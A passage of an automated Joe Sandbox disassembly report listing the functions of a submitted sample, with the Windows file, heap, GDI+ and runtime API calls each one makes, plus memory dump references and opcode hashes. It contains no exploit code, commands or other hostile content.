                • Part of subcall function 00828FA5: GetLastError.KERNEL32(?,00840EE8,00823E14,00840EE8,?,?,00823713,00000050,?,00840EE8,00000200), ref: 00828FA9
                • Part of subcall function 00828FA5: _free.LIBCMT ref: 00828FDC
                • Part of subcall function 00828FA5: SetLastError.KERNEL32(00000000,?,00840EE8,00000200), ref: 0082901D
                • Part of subcall function 00828FA5: _abort.LIBCMT ref: 00829023
                • Part of subcall function 0082B2AE: _abort.LIBCMT ref: 0082B2E0
                • Part of subcall function 0082B2AE: _free.LIBCMT ref: 0082B314
                • Part of subcall function 0082AF1B: GetOEMCP.KERNEL32(00000000,?,?,0082B1A5,?), ref: 0082AF46
              • _free.LIBCMT ref: 0082B200
              • _free.LIBCMT ref: 0082B236
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: 55c821e8089afac7ee4120965f9771ee102dc732222d4377c96ab26e45c3f628
              • Instruction ID: b845e6cf095605fa5f710191ee7469bbe9e0144c6bf6d2b73c25834c70643455
              • Opcode Fuzzy Hash: 55c821e8089afac7ee4120965f9771ee102dc732222d4377c96ab26e45c3f628
              • Instruction Fuzzy Hash: 8031AD31906228EFDB10EFA9E841BADB7E5FF45320F254099E814DB291EB729D81CB51
              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00809EDC,?,?,00807867), ref: 008097A6
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00809EDC,?,?,00807867), ref: 008097DB
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: e34ae227e508bd7cbfcfd13cd231956ad483ec71828047fda4b5cf16fcacf72e
              • Instruction ID: 203444ff7ad37d6ac17f371634418b279b425ca476e2467824e8769c6af4696d
              • Opcode Fuzzy Hash: e34ae227e508bd7cbfcfd13cd231956ad483ec71828047fda4b5cf16fcacf72e
              • Instruction Fuzzy Hash: 7D21E1B2114748AEE7708F64CC85BA7B7E8FB49764F00492DF5E5C21E2C374AC898A61
              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00807547,?,?,?,?), ref: 00809D7C
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00809E2C
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: File$BuffersFlushTime
              • String ID:
              • API String ID: 1392018926-0
              • Opcode ID: 97d82b14a36bd2fcbe844b0b14427b27d7d1d215a7fb9c0b1d02d245c52dfe6a
              • Instruction ID: fce17eec809f63cfbdb1b4364db5f791c6c0bbb5f6640114d0c62b5ec54580a6
              • Opcode Fuzzy Hash: 97d82b14a36bd2fcbe844b0b14427b27d7d1d215a7fb9c0b1d02d245c52dfe6a
              • Instruction Fuzzy Hash: 3B21D631188246ABC754DE24CC51AABBBE8FF96708F04081DF8D1C7182D329DA4CDB51
              APIs
              • GetProcAddress.KERNEL32(00000000,00833958), ref: 0082A4B8
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0082A4C5
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID:
              • API String ID: 2279764990-0
              • Opcode ID: 9994737ed52fbe3ce4d46eeb31fd9b96741245ae72db0e450fd6cc630c9d2216
              • Instruction ID: 8ad4f23b07f9a8a9a94c5bb1c70f2556ed9397fc7ce17abb0d8804d932d50956
              • Opcode Fuzzy Hash: 9994737ed52fbe3ce4d46eeb31fd9b96741245ae72db0e450fd6cc630c9d2216
              • Instruction Fuzzy Hash: 1B11E333A016359B9B2AAE28FC458AA7395FF803247164620ED15EB284EA74DCC1C6D6
              APIs
              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00809B35,?,?,00000000,?,?,00808D9C,?), ref: 00809BC0
              • GetLastError.KERNEL32 ref: 00809BCD
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: b0b4d906057e185f19a8322acd0d19b153026661dab2ca2577f0bbece74b03ee
              • Instruction ID: 9fe232f2bee274d8bea4b700478e8df2c58fd08163d15172b399519034e45a8d
              • Opcode Fuzzy Hash: b0b4d906057e185f19a8322acd0d19b153026661dab2ca2577f0bbece74b03ee
              • Instruction Fuzzy Hash: 200104313052299BCB48CE29ACA487EB399FFC1331B10852DF892C32C2DA30D8059A21
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00809E76
              • GetLastError.KERNEL32 ref: 00809E82
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 272ac8874eac29eb26057a7dd28a3420d47c7216710c36647f0a8d207f202097
              • Instruction ID: e67e7b16dcac41e1d4c774932b20de2ec82cbba22f671a4e72948dfa8ab20ae2
              • Opcode Fuzzy Hash: 272ac8874eac29eb26057a7dd28a3420d47c7216710c36647f0a8d207f202097
              • Instruction Fuzzy Hash: F0019E713052045BEB74DE69DC44B6BB6D9FB88328F14493EF286C26D1DAB5EC488611
              APIs
              • _free.LIBCMT ref: 00828627
                • Part of subcall function 00828518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A
              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00840F50,0080CE57,?,?,?,?,?,?), ref: 00828663
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Heap$AllocAllocate_free
              • String ID:
              • API String ID: 2447670028-0
              • Opcode ID: 9ce6fcf8416d1d6272643955b39385414b59737af296663699dba79ca928310f
              • Instruction ID: 23ca2bbdb5be33288278a9815d28663c7f03dde7c4009efefa7a76ebb03229f0
              • Opcode Fuzzy Hash: 9ce6fcf8416d1d6272643955b39385414b59737af296663699dba79ca928310f
              • Instruction Fuzzy Hash: 74F0C231103135EACF312A2ABC08B6B3B58FFF1BB1F248115F814D6191DF20C8C095A6
              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00810915
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 0081091C
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Process$AffinityCurrentMask
              • String ID:
              • API String ID: 1231390398-0
              • Opcode ID: 4128fe706283962a088298e2fe16d15295ee96feed1ddcf888f29f2190723334
              • Instruction ID: 7dae5ea3e7ffabf9f9ccafa382a61cb9af6fb3f2e264df6af6517986e41349da
              • Opcode Fuzzy Hash: 4128fe706283962a088298e2fe16d15295ee96feed1ddcf888f29f2190723334
              • Instruction Fuzzy Hash: 68E09232A11109BB6F09CAB49C248FB7B9DFF442147204579A80AD7201F970DEC18EA0
              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0080A27A,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A458
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0080A27A,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A489
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: ae27ff8c8d6bbb81a25fca49352105e3814bc580a6b86dfbb7e9e00f665c8b47
              • Instruction ID: 98f5338d048695be27ee354486da6a90219f8a8b1d888b7b8fd7b187a0e6596b
              • Opcode Fuzzy Hash: ae27ff8c8d6bbb81a25fca49352105e3814bc580a6b86dfbb7e9e00f665c8b47
              • Instruction Fuzzy Hash: 60F0A03524120D7BEF015F60DC45FD9776CFF04382F048051BC88E61A1DB728AA9AA51
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: 84e2973a5064b63b12716fe66360d1183580de4c39619a291c0bb73abacae4d5
              • Instruction ID: 1836f973459712fc4309bc37ff2bfff622a5958b45f6a341a1ba49ff8fdb7789
              • Opcode Fuzzy Hash: 84e2973a5064b63b12716fe66360d1183580de4c39619a291c0bb73abacae4d5
              • Instruction Fuzzy Hash: 9BF0A072504348AAEB11ABA49C06FEE775DFB05745F040995BB00E30A2DA716AA08662
              APIs
              • DeleteFileW.KERNELBASE(?,?,?,0080984C,?,?,00809688,?,?,?,?,00831FA1,000000FF), ref: 0080A13E
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0080984C,?,?,00809688,?,?,?,?,00831FA1,000000FF), ref: 0080A16C
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 51a69a92d2dccdd898a408c7c72a4d65822408b71dc4c8846b7e059a84889dd1
              • Instruction ID: 136bd5f4f6066db03808217507f7ce85e56ae7e6b5f9e7350dac99e380713c80
              • Opcode Fuzzy Hash: 51a69a92d2dccdd898a408c7c72a4d65822408b71dc4c8846b7e059a84889dd1
              • Instruction Fuzzy Hash: 8FE092356402086BDB119F64DC41FE9776CFF08382F484065BC88D31A0DB629ED4AA91
              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,?,00831FA1,000000FF), ref: 0081A3D1
              • CoUninitialize.COMBASE(?,?,?,?,00831FA1,000000FF), ref: 0081A3D6
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: 094129aa93b10998413dd0ebe5a2e41f4124fd340f67b9d4fcbbe378dc702ba1
              • Instruction ID: c596c702337efce4d1517ad8e682be93cacdf0f8014cf6d744ef174bcf045238
              • Opcode Fuzzy Hash: 094129aa93b10998413dd0ebe5a2e41f4124fd340f67b9d4fcbbe378dc702ba1
              • Instruction Fuzzy Hash: A7F03932618A54EFC710AB4CDC05B5AFBACFB89B20F04436AF419C3B60CB796800CAD1
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,0080A189,?,008076B2,?,?,?,?), ref: 0080A1A5
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0080A189,?,008076B2,?,?,?,?), ref: 0080A1D1
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 076455675fc6a89c6aa993e9f0cec69e1cacc07ea010f8408d62820503ac4950
              • Instruction ID: b404c9d5a53e74482612e9c73625018e5bf35cc672743b0168376bf355152896
              • Opcode Fuzzy Hash: 076455675fc6a89c6aa993e9f0cec69e1cacc07ea010f8408d62820503ac4950
              • Instruction Fuzzy Hash: E7E092355001285BDB60AB68DC05BD9B76CFB083E1F0042A1FD55E32E0D7719E889AE1
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008100A0
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0080EB86,Crypt32.dll,00000000,0080EC0A,?,?,0080EBEC,?,?,?), ref: 008100C2
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              • Opcode ID: 6278da46afcf6bd2023a9c8d25951973915cf57b882f59590eb82c185aecce7d
              • Instruction ID: 74776f6e9f9322874e6eaf94c4f840b61aeea3a7739b714feaecaef3a46a1a40
              • Opcode Fuzzy Hash: 6278da46afcf6bd2023a9c8d25951973915cf57b882f59590eb82c185aecce7d
              • Instruction Fuzzy Hash: D3E0127690151C6ADB219AA4AC05FD6B76CFF0D392F0404A5B948D3154DA749A848BA1
              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00819B30
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00819B37
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              • Opcode ID: 0b18284a0dac53eb128461b173c823d988c3f1f9e719af0cd18dc0c5dc326dea
              • Instruction ID: 4e41db1019312382d5e4d59a4eb590bf29c55ec27d70146cb82f7cdb480124b0
              • Opcode Fuzzy Hash: 0b18284a0dac53eb128461b173c823d988c3f1f9e719af0cd18dc0c5dc326dea
              • Instruction Fuzzy Hash: 4DE0ED71905218EBDB10DF99D5016D9B7ECFF09721F20805BFC99D3200E671AE84DB91
              APIs
                • Part of subcall function 0082329A: try_get_function.LIBVCRUNTIME ref: 008232AF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0082217A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00822185
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: d065fe563dd4271175f6828d81d643936529666fd82960afc132cb50b53e4163
              • Instruction ID: a62b0f6f0c215c04b88586ae9a53840987f327da4b5a555c04d284496a8f274d
              • Opcode Fuzzy Hash: d065fe563dd4271175f6828d81d643936529666fd82960afc132cb50b53e4163
              • Instruction Fuzzy Hash: B7D0A724504735343D0426B83857D983344F851B743F00A45E330C51D1FF1861D06013
              APIs
              • DloadLock.DELAYIMP ref: 0081DC73
              • DloadProtectSection.DELAYIMP ref: 0081DC8F
                • Part of subcall function 0081DE67: DloadObtainSection.DELAYIMP ref: 0081DE77
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Dload$Section$LockObtainProtect
              • String ID:
              • API String ID: 731663317-0
              • Opcode ID: 1c4cbd5fbcd6308fb25442ee8237fc34eecec2bb00e3f53ac0d5ff6c092fabca
              • Instruction ID: 5f1e016d3458ebac366201d0df4babb303de4ad608ed27b5aa19edcc0b98b067
              • Opcode Fuzzy Hash: 1c4cbd5fbcd6308fb25442ee8237fc34eecec2bb00e3f53ac0d5ff6c092fabca
              • Instruction Fuzzy Hash: 4DD012B01403018AC615EB18B9467DD337CFF04748FA52A01F105C72A0DFF854C1CA4A
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              • Opcode ID: 9d360f8f06e9b8ea462e650e40240bb7fad92eabe90bbfb06988b78184b018fb
              • Instruction ID: ec055d225a6de4bbb5dbe045b16730d1ac9cb604ad5e2e1e14774e35b7f1b785
              • Opcode Fuzzy Hash: 9d360f8f06e9b8ea462e650e40240bb7fad92eabe90bbfb06988b78184b018fb
              • Instruction Fuzzy Hash: 93C0123205C600BFCB020BB0DC09D2FBBA8BBA6212F06C948F2A5C0060C238C010DB11
              APIs
              Memory Dump Source
